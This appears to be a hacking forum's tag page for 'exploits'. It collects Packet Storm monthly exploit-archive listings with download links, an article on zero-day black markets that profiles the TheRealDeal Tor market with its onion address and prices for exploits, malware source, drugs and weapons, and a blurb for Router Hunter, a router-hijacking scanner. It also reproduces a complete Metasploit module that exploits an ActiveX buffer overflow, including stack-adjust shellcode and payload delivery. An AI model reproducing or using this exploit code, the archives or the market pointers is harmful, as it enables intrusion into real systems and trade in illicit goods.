Search the Community
Showing results for tags 'exploits'.
-
This archive contains all of the 207 exploits added to Packet Storm in June, 2017. Content: advisory.txt GS20170621005447.tgz aerohive-exec.txt GS20170621005542.tgz alioap60-sql.txt GS20170621005750.txt apache_activemq_upload_jsp.rb.txt GS20170624175319.tgz apcups31414-escalate.txt GS20170624175445.tgz artifexmupdfmutool-nullpointer.tgz GS20170624175528.tgz artifexmupdf-nullpointer.tgz GS20170624175607.txt avast1112253-escalate.txt GS20170624175756.tgz beetel-dnschange.sh.txt GS20170630180753.tgz BIND9-PRIVILEGE-ESCALATION.txt GS20170630180845.tgz blackcatcms12-xss.txt gstreamer-null.tgz bypassuac_fodhelper.rb.txt hppagewide-exec.txt camstudio20-xssxsf.txt hws191-exec.txt CORE-2017-0003.txt iball-dnschange.sh.txt craftcms26-xssupload.txt ipb41192-xssxsrf.txt DC-2017-01-012.txt ipfire219-exec.txt DC-2017-01-022.txt jad158-overflow.txt DC-2017-04-002-IBM-DB2-Overflow.pdf joomlajoomrecipe103-sql.txt dcos_marathon.rb.txt kbvaultmysql016a-upload.txt digitalcanalwa-overflow.txt kronostelestaff-sql.txt diskboss8016-overflow.txt lame3995iii-overflow.tgz diskpulse9726-overflow.txt lame3995stepone-overflow.tgz disksorter9714input-overflow.txt libcroco-dos.tgz disksorter9714-overflow.txt libquicktime-dos.tgz dlink2640b-dnschange.sh.txt Linux_ldso_dynamic.c dlink2640b_SEA_1.01-dnschange.sh.txt Linux_ldso_hwcap_64.c dlink2640-dnschange.sh.txt Linux_ldso_hwcap.c dlinkdir100-xsrf.txt Linux_offset2lib.c dnstracer181-overflow.txt linux_sudo_cve-2017-1000367.c easyfilesharing_post.rb.txt lkkeyctl-dos.txt easymovcon1424-overflow.txt lkping-dos.txt ecomcart13-sql.txt logpoint-exec.txt ecs31-overflow.txt macosdiskarb-race.txt ecs31pass-disclose.txt mapscrn-overflow.txt ecs31-passwordreset.txt mikrotik-6-39-2ftp_buffer.py.txt efsws72account-overflow.txt mikrotik_cook_http_buffer.py.txt efsws72-bypass.txt mikrotik-overflow.py.txt efsws72gethttp-overflow.txt mmdm-dllhijack.txt efsws72postdep-overflow.txt msdotnet-dllhijack.txt efsws72post-overflow.txt msdynamiccrm-xss.txt ektron910sp1-xss.txt mswordmta-exec.txt elteksmartpack-backdoor.txt mybb-xss-fileenum.txt faad2-dos.tgz NAsamba.pl.txt fasm-overflow.txt NetBSD_CVE-2017-1000375.c FreeBSD_CVE-2017-1085.c netgear_dnslookup_cmd_exec.rb.txt FreeBSD_CVE-2017-FGPE.c nmep-escalate.txt FreeBSD_CVE-2017-FGPU.c ntfs31-dos.txt glpi0904-sql.txt nuevomailer6-sql.txt gnubinutilsaarch64-overflow.tgz OpenBSD_at.c gnubinutilsbfd-overflow.tgz parallels-desktop12-vm-escape.txt gnubinutilsdecodepseudo-overflow.tgz parallels-desktop-vm-escape.txt gnubinutilsdisassemble-overflow.tgz paulshop-sql.txt gnubinutilsieee-overflow.tgz phpmailer-xss.txt gnubinutilsinsn-overflow.tgz puttysshagent-overflow.txt gnubinutilsrxdecode-overflow.tgz QSA-20170601-2.txt googlechromev8-exec.txt realestateclassifieds-sql.txt gravcms142-xss.txt reiserfstune3625-overflow.txt GS20170601000226.txt riverbedsteelheadvcx-fileread.txt GS20170601000542.txt robert05-xssxsrftraversalsql.txt GS20170601000718.txt SA-20170607-0.txt GS20170601000844.txt SA-20170613-0.txt GS20170601001027.txt SA-20170622-0.txt GS20170601001134.txt safari101-overflow.tgz GS20170606141325.tgz schneiderelectricwiws-perms.txt GS20170613001803.tgz simplece230-xssxsrf.txt GS20170613133910.tgz sitecore72-xss.txt GS20170613134001.tgz Solaris_rsh.c GS20170613134052.tgz sophoscyberoam-xss.txt GS20170615234417.txt ssl_uaf.rb.txt GS20170615234641.txt SUBSONIC-CSRF-PERSISTENT-XSS.txt GS20170615234933.txt SUBSONIC-CSRF-SERVER-SIDE-REQUEST-FORGERY.txt GS20170615235223.txt SUBSONIC-PASSWORD-RESET-CSRF.txt GS20170621000010.tgz SUBSONIC-XML-EXTERNAL-ENITITY.txt GS20170621000128.tgz symantec_messaging_gateway_exec.rb.txt GS20170621000448.tgz syncbreeze9726-overflow.txt GS20170621000601.tgz SYSS-2017-018.txt GS20170621000701.tgz teamspeak314-overflow.txt GS20170621001802.tgz telegram3401-bypass.txt GS20170621001935.tgz UTstarcom-dnschange.sh.txt GS20170621002106.tgz vaadin776-xss.txt GS20170621002221.tgz VL-1973.txt GS20170621002505.tgz VL-2066.txt GS20170621002612.tgz VL-2067.txt GS20170621002722.tgz VL-2071.txt GS20170621002840.tgz VL-2073.txt GS20170621002954.tgz VL-2075.txt GS20170621003106.tgz VL-2076.txt GS20170621003438.tgz vmwarevsphere-deserialize.txt GS20170621003537.tgz vmwarews12pro-dos.txt GS20170621003652.tgz vxsearchenterprise9718-overflow.txt GS20170621003811.tgz wm2212-dos.tgz GS20170621003914.tgz wondercms210-xsrf.txt GS20170621004015.tgz wpdownloadmanager2951-xss.txt GS20170621004107.tgz wpeventlist078-sql.txt GS20170621004207.tgz wpformcraft105-sql.txt GS20170621004313.tgz wpjobmanager1261-xss.txt GS20170621004445.tgz wpjobs14-sql.txt GS20170621004712.tgz wpphotogallery1342-traversal.txt GS20170621004811.tgz wptestimonials-sql.txt GS20170621004907.tgz wpupc422-sql.txt GS20170621005001.tgz ws226-dos.tgz GS20170621005051.tgz X41-2017-005.txt GS20170621005218.tgz ZSL-2017-5413.txt GS20170621005320.tgz ZSL-2017-5414.txt Download: 1706-exploits.tgz (743.8 KB) Source
-
- 2
-
- packetstorm
- exploits
-
(and 1 more)
Tagged with:
-
169 exploituri https://packetstormsecurity.com/files/download/132117/1505-exploits.tgz
-
- exploits
- exploituri
-
(and 2 more)
Tagged with:
-
Introduction Black markets deployed on anonymizing networks such as Tor and I2P offer all kinds of illegal products, including drugs and weapons. They represent a pillar of the criminal ecosystem, as these black markets are the privileged places to acquire illegal goods and services by preserving the anonymity of both sellers and buyers and making it difficult to track payment transactions operated through virtual currencies like Bitcoin. The majority of people ignore that one of the most attractive goods in the underground market are zero-day exploits, malicious codes that could be used by hackers to exploit unknown vulnerabilities in any kind of software. The availability of zero-day exploits is a key element for a successful attack. The majority of state-sponsored attacks that go undetected for years rely on the exploitation of an unknown flaw in popular products on the market and SCADA systems. Zero-day exploits: A precious commodity Security experts have debated on several occasions the importance of the zero-day exploitation to design dangerous software that could target any kind of application. Zero-day exploits are among the most important components of any cyber weapons, and for this reason they are always present in the cyber arsenals of governments. Zero-day exploits could be used by threat actors for sabotage or for cyber espionage purposes, or they could be used to hit a specific category of software (i.e. mobile OSs for surveillance, SCADA application within a critical infrastructure). In some cases, security experts have discovered large scale operations infecting thousands of machines by exploiting zero-day vulnerabilities in common applications (e.g. Java platform, Adobe software). A few days ago, for example, security experts at FireEye detected a new highly targeted attack run by the APT28 hacking crew exploiting two zero-day flaws to compromise an “international government entity.” In this case, the APT28 took advantage of zero-day vulnerabilities in Adobe Flash software (CVE-2015-3043) and a Windows operating system (CVE-2015-1701). Zero-day exploits are commodities in the underground economy. Governments are the primary buyers in the growing zero-day market. Governments aren’t the only buyers however, exploit kits including zero-day are also acquired by non-government actors. In 2013 it was estimated that the market was able to provide 85 exploits per day, a concerning number for the security industry, and the situation today could be worse. It has been estimated that every year, zero-day hunters develop a combined 100 exploits, resulting in 85 privately known exploits, and this estimation does not include the data related to independent groups of hackers, whose activities are little known. Zero-day hunters are independent hackers or security firms that analyze every kind of software searching for a vulnerability. Then this knowledge is offered in black marketplaces to the highest bidder, no matter if it is a private company that will use it against a competitor or a government that wants to use it to target the critical infrastructure of an adversary. A study conducted by the experts at NSS Labs in 2013 titled “The Known Unknowns” reported that every day during a period of observation lasting three years, high-paying buyers had access to at least 60 vulnerabilities targeting common software produced by Adobe, Apple, Microsoft and Oracle. “NSS Labs has analyzed ten years of data from two major vulnerability purchase programs, and the results reveal that on any given day over the past three years, privileged groups have had access to at least 58 vulnerabilities targeting Microsoft, Apple, Oracle, or Adobe. Further, it has been found that these vulnerabilities remain private for an average of 151 days. These numbers are considered a minimum estimate of the ‘known unknowns’, as it is unlikely that cyber criminals, brokers, or government agencies will ever share data about their operations. Specialized companies are offering zero-day vulnerabilities for subscription fees that are well within the budget of. A determined attacker (for example, 25 zero-days per year for USD $2.5 million); this has broken the monopoly that nation states historically have held regarding ownership of the latest cyber weapon technology. Jointly, half a dozen boutique exploit providers have the capacity to offer more than 100 exploits per year.” On the black market, a zero-day exploit for a Windows OS sells for up to $250,000 according to BusinessWeek, a good incentive for hackers to focus their efforts in the discovery of this category of vulnerabilities. The price could increase in a significant way if the bugs affect critical systems and the buyer is a government that intends to use it for Information Warfare. What is very concerning is that in many cases, the professionals who discover a zero-day, in order to maximize gains, offer their knowledge to hostile governments who use it also to persecute dissidents or to attack adversary states. The zero-day market follows its own rules, the commodities are highly perishable, the transactions are instantaneous, and the agreement between buyers and sellers is critical. “According to a recent article in The New York Times, firms such as VUPEN (France), ReVuln (Malta), Netragard, Endgame Systems, and Exodus Intelligence (US) advertise that they sell knowledge of security vulnerabilities for cyber espionage. The average price lies between USD $40,000 and USD $160,000. Although some firms restrict their clientele, either based on country of origin or on decisions to sell to specific governments only, the ability to bypass this restriction through proxies seems entirely possible for determinedcyber criminals. Based on service brochures and public reports, these providers can deliver at least 100 exclusive exploits per year,” states the report. In particular, the US contractor Endgame Systems reportedly offers customers 25 exploits a year for $2.5 million. The uncontrolled and unregulated market of zero-day exploits pose a real threat for any industry. For this reason, security experts and government agencies constantly monitor its evolution. The zero-day market in the Deep Web: “TheRealDeal” marketplace Zero-day exploits have been available in several underground Deep Web marketplaces for a long time, and it is not difficult to find malicious codes and exploit kits in different black markets or hacking forums. Recently a new black market dubbed TheRealDeal has appeared in the Deep Web. The platform was designed to provide both sellers and buyers a privileged environment for the commercialization of precious goods. Figure – TheRealDeal Marketplace TheRealDeal (http://trdealmgn4uvm42g.onion) service appeared last month and it is focused on the commercialization of zero-day exploits. The singular marketplace is hosted on the popular Tor network to protect the anonymity of the actors involved in the sale of the precious commodity. The market offers zero-day exploits related to still unknown flaws and one-day exploits that have been already published, but are modified to be undetectable by defensive software. Figure – One-day private exploits The operators also offer one-day private exploits with known CVEs, but for which the code was never released. They also anticipated that a seller specialized in exploits for the GSM platform will soon offer a listing for some very interesting hardware. Who is behind TheRealDeal? The ‘deepdotweb’ website published an interview with one of the administrators of the black market who explained that the project is operated by four cyber experts with significant experience dealing in the “clearnet when it comes to zero-day exploit code, databases and so on.” The administrator explained that the greatest risk in commercializing zero-day exploits is that in the majority of cases, the code does not work or simply the sellers are scammers. Another factor that convicted the administrators to launch the TheRealDeal zero-day marketplace is the consideration that the places where it is possible to find the precious goods are not always easy to reach. There are some IRC servers that are not easy to find or that request an invitation. Differently, TheRealDeal wants to be an ‘open-market’ focused on zero-days. The four experts decided to launch the hidden service to create a marketplace where people can trade zero-day exploits without becoming a victim of fraud and while staying in total anonymity. “We started off by using BitWasp, fully aware of its history and flaws, but since we have years of hands-on experience in the security industry and not much in web-design we decided it would be a good platform since we can make our own security assessments and patches while the whole multi-sig seems to work perfect. We also wanted to avoid involving other people in the project for obvious reasons and that was another reason why not to hire a web designer etc… although we might hire one off the darknet soon, just to improve the UI a little,” said one of the administrators. Below is the list of products available on the TheRealDeal marketplace: 0-Day exploits (4) FUD Exploits (4) 1Day Private Exploits (1) Information (5) Money (36) Source Code (4) Spam (3) Accounts (7) Cards Other Tools (3) RATs (1) Hardware (2) Drugs Misc (6) Pharmacy (12) Cannabis (5) LSD (1) Shrooms (2) MDMA (6) Speed (5) Services (8) Weapons Hot (1) Cold (6) CNC Analyzing the product listing of TheRealDeal Market, it is possible to note the availability of zero-day exploits, which are source codes that could be used by hackers in cyber attacks, and of course any kind of hacking tool. The list is still short because the market is still in an embryonic stage, but the policy of its directors is clear. “Welcome…We originally opened this market in order to be a ‘code market’ — where rare information and code can be obtained,” a message from the website’s anonymous administrator reads. “Completely avoid the scam/scum and enjoy the real code, real information and real products.” Among the products there is a new method of hacking Apple iCloud accounts and exploit kits that could be used to compromise WordPress-based websites and both mobile and desktop OSs (i.e. Android and Windows). The price tag for the iCloud hack is $17,000, and as explained by the seller, it is possible to compromise any account. The buyer could pay in Bitcoin to make their identification difficult. “Any account can be accessed with a malicious request from a proxy account,” reads the description of the hack available on TheRealDeal marketplace. “Please arrange a demonstration using my service listing to hack an account of your choice.” Figure – Zero-day exploits The listing also includes an Internet Explorer attack that is offered for $8,000 in Bitcoin, as reported by Wired in a blog post: “Others include a technique to hack WordPress’ multisite configuration, an exploit against Android’s Webview stock browser, and an Internet Explorer attack that claims to work on Windows XP, Windows Vista and Windows 7, available for around $8,000 in bitcoin … Found 2 months ago by fuzzing,” the seller writes, referring to an automated method of testing a program against random samples of junk data to see when it crashes. “0day but might be exposed, can’t really tell without risking a lot of money,” the seller adds. “Willing to show a demo via the usual ways, message me but don’t waste my time!” The list of products has been recently updated. It also includes an exploit for the MS15-034 Microsoft IIS Remote Code Execution vulnerability, a flaw that is being actively exploited in the wild against Windows 7, 8, and 8.1, Windows Server 2008 R2, 2012, and 2012 R2. TheRealDeal market also offers other products very common in the criminal ecosystem, including drugs, weapons, and Remote Access Trojan (RAT). The operators also created a specific “services” category with the intent to attract high-profile black hats offering their hacking services (i.e. Email account takeover, DDoS services, data theft, hacking campaign). The Information category was created for sellers that offer any kind of information, documents, databases, secret keys, and similar products. TheRealDeal doesn’t implement a real escrow model; instead it adopts a multi-signature model to make any financial transaction effective. Basically, the buyer, the seller and the administrators control the amount of Bitcoin to transfer together, and any transaction needs the signature of two out of the three parties before funds are transferred. The administrators decided to implement multisig transactions because their marketplace is very young and without reputation. This means that people has no incentive to deposit a sum of money for something that they are not able to verify. It is curious to note that the marketplace also offers drugs due to high demand, but according to the administrators they might consider removing them in the future. There is also a “services” category – anything can go there, but we are hoping for some high quality blackhats to come forward and offer their services, anything from obtaining access to an email and getting a certain document and up to long term campaigns. The hardware category is for toys like fake cellular base stations and other physical ‘hacking’ tools. The information category is for any kind of information, documents, databases, secret keys, etc. In the following table are the principal product categories offered in the market and their prices. 0-Day exploits Apple id / iCloud remote exploit USD 17025,52 Internet Explorer <= 11 USD 7840,70 Android WebView 0day RCE USD 8176,73 WordPress MU RCE USD 1008,09 Category: FUD Exploits FUD .js download and execute USD 291,23 Adobe Flash < 16.0.0.296 (CVE-2015-0313) USD 560,05 Adobe Flash < 16.0.0.287 (CVE-2015-0311) USD 560,05 Category: 1Day Private Exploits MS15-034 Microsoft IIS Remote USD 42313,18 Category: Hardware A5/1 Encryption Rainbow Tables USD 67,21 Category: Source Code Banking malware source code USD 2,11 Alina POS malware full source code USD 0,92 Exploit Kits Source Code USD 1,82 “Start your own maket” code and server USD 7959,43 I’ll keep you updated on the evolution of the TheRealDeal marketplace in the next weeks. References http://securityaffairs.co/wordpress/36098/cyber-crime/therealdeal-black-marketplace-exploits.html http://www.wired.com/2015/04/therealdeal-zero-day-exploits/ http://securityaffairs.co/wordpress/14561/malware/zero-day-market-governments-main-buyers.html https://www.nsslabs.com/reports/known-unknowns-0 http://www.deepdotweb.com/2015/04/08/therealdeal-dark-net-market-for-code-0days-exploits/ Source
-
This archive contains 174 exploits that were added to Packet Storm in April, 2015. 1504-exploits/ 1504-exploits/wpwoocommerceaa-shelldisclose.txt 1504-exploits/emailmarkerter-xss.txt 1504-exploits/projectsend561-xsrf.txt 1504-exploits/nodesstudio-sqlxssdiscose.txt 1504-exploits/wpsam-disclose.txt 1504-exploits/VL-1314.txt 1504-exploits/VL-1227.txt 1504-exploits/airties-exec.txt 1504-exploits/oracledotcom-xss.txt 1504-exploits/prolink-xsrf.txt 1504-exploits/PRL-2015-05.tgz 1504-exploits/wpphpec-upload.txt 1504-exploits/AS-WFTP0328.txt 1504-exploits/hippocms-crlf.txt 1504-exploits/bloofoxcms050-xss.txt 1504-exploits/wpbusinessintelligence-sql.txt 1504-exploits/wpthecartpress-xsslfi.txt 1504-exploits/netgearwnr2000v4-xssexec.txt 1504-exploits/SpiritSploit.py.txt 1504-exploits/ms15-034.txt 1504-exploits/mediasuitecms-disclose.txt 1504-exploits/proftpd135-filecopy.txt 1504-exploits/6kbbs80-xss.txt 1504-exploits/cve-2014-7822_poc.c 1504-exploits/proftpd135-exec.txt 1504-exploits/wpallinone-sql.txt 1504-exploits/multi_ncc_ping_exec.rb.txt 1504-exploits/phplist3010-insecure.txt 1504-exploits/6kbbs-sql.txt 1504-exploits/0xb16b00b5.tgz 1504-exploits/adbbackup-traversal.txt 1504-exploits/netcatcms-traversal.txt 1504-exploits/wp42-xss.txt 1504-exploits/fedoraabrt-racecondition.txt 1504-exploits/oraclehyperionsmart-dos.txt 1504-exploits/VL-1311.txt 1504-exploits/wpfusionengage-disclose.txt 1504-exploits/VL-1322.txt 1504-exploits/wpnexforms-sql.txt 1504-exploits/landesk-rfixsrf.txt 1504-exploits/VL-1445.txt 1504-exploits/wp_wpshop_ecommerce_file_upload.rb.txt 1504-exploits/wp_inboundio_marketing_file_upload.rb.txt 1504-exploits/honeywell-traversal.txt 1504-exploits/VL-1455.txt 1504-exploits/adobe_flash_casi32_int_overflow.rb.txt 1504-exploits/proverbswebcal212-xss.txt 1504-exploits/wtknetwork-sql.txt 1504-exploits/kemploadmaster-execxsrfxssdos.txt 1504-exploits/wpduplicator-sqlxsrf.txt 1504-exploits/VL-1215.txt 1504-exploits/wp_worktheflow_upload.rb.txt 1504-exploits/rootpipe.rb.txt 1504-exploits/6kbbs80-xsrf.txt 1504-exploits/fmp3cr2628-overflow.txt 1504-exploits/wpyoastgs-xss.txt 1504-exploits/ninja-racecondition.txt 1504-exploits/opointmedia-openredirect.txt 1504-exploits/wp_nmediawebsite_file_upload.rb.txt 1504-exploits/texttospeech-xss.txt 1504-exploits/wpnexforms3-sql.txt 1504-exploits/nasagov-xss.txt 1504-exploits/sambaopenldap-xss.txt 1504-exploits/wpcontentslide-xssxsrf.txt 1504-exploits/wpsam-upload.txt 1504-exploits/freepbx-xss.txt 1504-exploits/pligg202-xss.txt 1504-exploits/ZSL-2015-5240.txt 1504-exploits/netcatcms-inject.txt 1504-exploits/phpsfp-sql.txt 1504-exploits/ZSL-2015-5238.txt 1504-exploits/wptunelibrary154-sql.txt 1504-exploits/testdisk-overflow.txt 1504-exploits/websid-xss.txt 1504-exploits/wpshareaholic-xss.txt 1504-exploits/cpx_proftp.py.txt 1504-exploits/huaweiseqanalyst-xss.txt 1504-exploits/jaws111-xsrf.txt 1504-exploits/wpmon-disclose.txt 1504-exploits/untangle-xssdisclose.txt 1504-exploits/samsungipolis-exec.txt 1504-exploits/orangehrm321411-sqlxss.txt 1504-exploits/jboss_seam_upload_exec.rb.txt 1504-exploits/netsol_web_mail.pdf 1504-exploits/SA-20150409-0.txt 1504-exploits/VL-1444.txt 1504-exploits/edruttmsdpim-traversalfile.txt 1504-exploits/zenworks-exectraversal.txt 1504-exploits/hotexbilling-xss.txt 1504-exploits/osxrootpipe-escalate.txt 1504-exploits/miniupnpd-overflow.txt 1504-exploits/wprevolutionslider-shell.txt 1504-exploits/ossolution-sql.txt 1504-exploits/VL-1228.txt 1504-exploits/wpdesignfolio-shell.txt 1504-exploits/wpcommunityevents135-sql.txt 1504-exploits/thehunter.txt 1504-exploits/CORE-2015-0008.txt 1504-exploits/solarwinds_fsm_userlogin.rb.txt 1504-exploits/phptraffica23-xss.txt 1504-exploits/pimcorecms305-xsrf.txt 1504-exploits/wolfcms082-shell.txt 1504-exploits/otrs31x-xss.txt 1504-exploits/php-typeconfusion.txt 1504-exploits/avsarsoftmatbaa-shellxss.txt 1504-exploits/wooframework451-xss.txt 1504-exploits/joomlasimplephotogallery-shell.txt 1504-exploits/ubuntuusbcreator-escalate.txt 1504-exploits/wp_creativecontactform_file_upload.rb.txt 1504-exploits/weebly-hijack.txt 1504-exploits/wpultimatenewspaper-xss.txt 1504-exploits/wpvvci-shell.txt 1504-exploits/PRL-2015-04.tgz 1504-exploits/idm6-dllhijack.txt 1504-exploits/Mac-OS-X_Fat-DoS.c 1504-exploits/openletters-inject.txt 1504-exploits/encapsflashgallery-dos.txt 1504-exploits/VL-1438.txt 1504-exploits/adobe_flash_copy_pixels_to_byte_array.rb.txt 1504-exploits/flatpress10-xss.txt 1504-exploits/SA-20150410-0.txt 1504-exploits/synology-xss.txt 1504-exploits/VL-1453.txt 1504-exploits/wp_slideshowgallery_upload.rb.txt 1504-exploits/edruttmsdprv-xss.txt 1504-exploits/edruttmsdp-redirect.txt 1504-exploits/VL-1474.txt 1504-exploits/wpsam-sql.txt 1504-exploits/ZSL-2015-5242.txt 1504-exploits/VL-1452.txt 1504-exploits/javacom-xss.txt 1504-exploits/barracuda_5x_reports_postauth_root_exploit.rb.txt 1504-exploits/safari-crossdomain.txt 1504-exploits/SGMA15-002.txt 1504-exploits/VL-1359.txt 1504-exploits/comsenzsupesitecms70-xss.txt 1504-exploits/eceprojects-xss.txt 1504-exploits/apachespark-exec.txt 1504-exploits/ceragon_fibeair_known_privkey.rb.txt 1504-exploits/wpcitizenspace-xss.txt 1504-exploits/VL-1447.txt 1504-exploits/edruttmsdp-xss.txt 1504-exploits/ceragonfibeair-disclose.txt 1504-exploits/zyxel-dos.txt 1504-exploits/huaweiseqanalyst-xxe.txt 1504-exploits/wpqaengine-escalate.txt 1504-exploits/apportabrt-exec.txt 1504-exploits/qlik-redirect.txt 1504-exploits/wpvideogallery28-sql.txt 1504-exploits/pyscripter-dllhijack.txt 1504-exploits/bluedragon-traversal.txt 1504-exploits/meela-xss.txt 1504-exploits/unipdf12-overflow.txt 1504-exploits/wpworktheflow252-shell.txt 1504-exploits/VL-1446.txt 1504-exploits/soapfault-typeconfusion.txt 1504-exploits/wpnmediawcf-shell.txt 1504-exploits/mefa-xss.txt 1504-exploits/goautodial-execsqlupload.txt 1504-exploits/ZSL-2015-5239.txt 1504-exploits/ZSL-2015-5241.txt 1504-exploits/wpseopack180-shell.txt 1504-exploits/wpstatistics912-xss.txt 1504-exploits/wpvvp-shell.txt 1504-exploits/xoops2571-xss.txt 1504-exploits/androidbackupagent-exec.txt 1504-exploits/apportabrt-issues.txt 1504-exploits/freebsdkey-disclose.txt 1504-exploits/legend_rce.py.txt 1504-exploits/wpwdippu-upload.txt 1504-exploits/wp_reflexgallery_file_upload.rb.txt 1504-exploits/libarchive-dos.tgz 1504-exploits/log2space62-xss.txt 1504-exploits/wpajaxstorelocator-sql.txt tar: 1504-exploits/wpajaxstorelocator-sql.txt: time stamp 2015-05-16 05:33:33 is 1279061.268089756 s in the future Download
-
- 1
-
- 1504-exploits/vl-1453.txt
- april
-
(and 3 more)
Tagged with:
-
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer def initialize(info={}) super(update_info(info, 'Name' => "X360 VideoPlayer ActiveX Control Buffer Overflow", 'Description' => %q{ This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the X360 Software. By setting an overly long value to 'ConvertFile()',an attacker can overrun a .data buffer to bypass ASLR/DEP and finally execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => [ 'Rh0', # vulnerability discovery and exploit, all the hard work 'juan vazquez' # msf module ], 'References' => [ ['EDB', '35948'], ['URL', 'https://rh0dev.github.io/blog/2015/fun-with-info-leaks/'] ], 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'PrependEncoder' => stack_adjust }, 'DefaultOptions' => { 'InitialAutoRunScript' => 'migrate -f' }, 'Platform' => 'win', 'Arch' => ARCH_X86, 'BrowserRequirements' => { :source => /script|headers/i, :clsid => "{4B3476C6-185A-4D19-BB09-718B565FA67B}", :os_name => OperatingSystems::Match::WINDOWS, :ua_name => Msf::HttpClients::IE, :ua_ver => '10.0' }, 'Targets' => [ [ 'Automatic', {} ] ], 'Privileged' => false, 'DisclosureDate' => "Jan 30 2015", 'DefaultTarget' => 0)) end def stack_adjust adjust = "\x64\xa1\x18\x00\x00\x00" # mov eax, fs:[0x18 # get teb adjust << "\x83\xC0\x08" # add eax, byte 8 # get pointer to stacklimit adjust << "\x8b\x20" # mov esp, [eax] # put esp at stacklimit adjust << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # plus a little offset adjust end def on_request_exploit(cli, request, target_info) print_status("Request: #{request.uri}") case request.uri when /exploit.js/ print_status("Sending exploit.js...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'} send_exploit_html(cli, exploit_template(cli, target_info), headers) when /sprayer.js/ print_status("Sending sprayer.js...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'} send_exploit_html(cli, sprayer_template(cli, target_info), headers) when /informer.js/ print_status("Sending informer.js...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'} send_exploit_html(cli, informer_template(cli, target_info), headers) when /rop_builder.js/ print_status("Sending rop_builder.js...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'application/javascript'} send_exploit_html(cli, rop_builder_template(cli, target_info), headers) else print_status("Sending main.html...") headers = {'Pragma' => 'no-cache', 'Content-Type'=>'text/html'} send_exploit_html(cli, main_template(cli, target_info), headers) end end def main_template(cli, target_info) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'main.html') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def exploit_template(cli, target_info) shellcode = Rex::Text.to_hex(get_payload(cli, target_info)) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'exploit.js') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def sprayer_template(cli, target_info) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'sprayer.js') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def informer_template(cli, target_info) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'informer.js') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def rop_builder_template(cli, target_info) path = ::File.join(Msf::Config.data_directory, 'exploits', 'edb-35948', 'js', 'rop_builder.js') template = '' File.open(path, 'rb') { |f| template = strip_comments(f.read) } return template, binding() end def strip_comments(input) input.gsub(/\/\/.*$/, '') end end Source
-
Router Hunter is a php script that scans for and exploits DNS change vulnerabilities in Shuttle Tech ADSL Modem-Router 915 WM and D-Link DSL-2740R routers and also exploits the credential disclosure vulnerability in LG DVR LE6016D devices. Download
-
- credential
- exploits
-
(and 3 more)
Tagged with:
-
This archive contains all of the 118 exploits added to Packet Storm in April, 2013. Directory of C:\1304-exploits\1304-exploits 05/01/2013 01:02 PM <DIR> . 05/01/2013 01:02 PM <DIR> .. 04/09/2013 12:52 AM 1,457 aastra-passwd.txt 04/10/2013 05:25 AM 20,449 adobe_coldfusion_apsb13_03.rb.txt 04/01/2013 09:52 PM 1,386 aspen-traversal.txt 04/07/2013 08:52 PM 2,425 belkinwemo-upload.txt 04/11/2013 06:25 AM 5,775 bigant297-overflow.txt 04/25/2013 12:52 AM 2,654 ciscolinksys2000-dos.txt 04/26/2013 03:41 PM 2,672 cmscameronmckenna-xss.txt 04/21/2013 04:52 PM 3,176 colormix-xssspoofdisclose.txt 04/30/2013 04:10 AM 16,232 CORE-2013-0301.txt 04/30/2013 04:11 AM 20,324 CORE-2013-0303.txt 04/19/2013 03:41 PM 1,338 craftysyntax-rfidisclose.txt 04/05/2013 04:03 AM 5,531 CRD-2013-02.txt 04/24/2013 04:03 AM 5,746 dir615300-execxssxsrf.txt 04/26/2013 10:52 PM 5,350 dir635-xssxsrf.txt 04/09/2013 06:52 AM 4,546 dlink-inject.txt 04/11/2013 07:20 AM 6,862 dlink_diagnostic_exec_noauth.rb.txt 04/13/2013 08:25 PM 3,444 dotclear-spoofxss.txt 04/06/2013 01:52 PM 3,512 easyftpserver-dos.txt 04/09/2013 04:30 AM 4,664 easyphpwebserver-exec.txt 04/27/2013 07:14 PM 631 elecardmpeg-overflow.txt 04/13/2013 07:03 PM 3,303 fmw-passwd.txt 04/30/2013 04:00 AM 1,084 foecms165-sqlxss.txt 04/18/2013 11:14 PM 1,240 forkcms-lfi.txt 04/18/2013 09:52 PM 1,177 forkcms-storedxss.txt 04/18/2013 10:52 PM 1,670 forkcms-xsrf.txt 04/09/2013 08:24 AM 711 foscam-xsrf.txt 04/19/2013 04:14 PM 46,020 foxitreader5-dos.tgz 04/18/2013 05:25 AM 1,900 freefloatftp_user.rb.txt 04/28/2013 02:52 AM 3,530 freepbx-exec.txt 04/03/2013 06:52 PM 4,934 fudforum-exec.txt 04/25/2013 04:29 AM 3,992 groundwork_monarch_cmd_exec.rb.txt 04/08/2013 01:52 PM 3,305 hexchat-overflow.txt 04/24/2013 10:52 PM 1,330 hornbill-sql.txt 04/07/2013 08:03 PM 2,628 hp_smhstart.rb.txt 04/02/2013 07:39 PM 2,572 hp_system_management.rb.txt 04/02/2013 08:30 AM 266 index.html 04/30/2013 03:57 AM 1,616 ipswitchimail-xss.txt 04/12/2013 05:00 AM 1,862 ircd-hybrid.pl.txt 04/27/2013 01:52 PM 1,066 ironlavacorp-sqlshell.txt 04/23/2013 06:43 AM 4,440 java_jre17_reflection_types.rb.txt 04/22/2013 07:14 PM 6,710 joomlacivic-shell.txt 04/21/2013 07:14 PM 3,905 jplayer-xssspoof.txt 04/10/2013 06:29 AM 1,617 karteekdocsplit-exec.txt 04/12/2013 05:03 AM 2,559 kelreddpruview-exec.txt 